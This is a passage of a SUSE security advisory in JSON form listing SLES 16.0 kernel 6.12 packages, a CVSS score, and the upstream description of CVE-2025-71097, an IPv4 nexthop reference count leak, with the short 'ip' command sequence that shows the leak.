"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71095"
},
{
"cve": "CVE-2025-71097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: Fix reference count leak when using error routes with nexthop objects\n\nWhen a nexthop object is deleted, it is marked as dead and then\nfib_table_flush() is called to flush all the routes that are using the\ndead nexthop.\n\nThe current logic in fib_table_flush() is to only flush error routes\n(e.g., blackhole) when it is called as part of network namespace\ndismantle (i.e., with flush_all=true). Therefore, error routes are not\nflushed when their nexthop object is deleted:\n\n # ip link add name dummy1 up type dummy\n # ip nexthop add id 1 dev dummy1\n # ip route add 198.51.100.1/32 nhid 1\n # ip route add blackhole 198.51.100.2/32 nhid 1\n # ip nexthop del id 1\n # ip route show\n blackhole 198.51.100.2 nhid 1 dev dummy1\n\nAs such, they keep holding a reference on the nexthop object which in\nturn holds a reference on the nexthop device, resulting in a reference\ncount leak:\n\n # ip link del dev dummy1\n [ 70.516258] unregister_netdevice: waiting for dummy1 to become free. Usage count = 2\n\nFix by flushing error routes when their nexthop is marked as dead.\n\nIPv6 does not suffer from this problem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
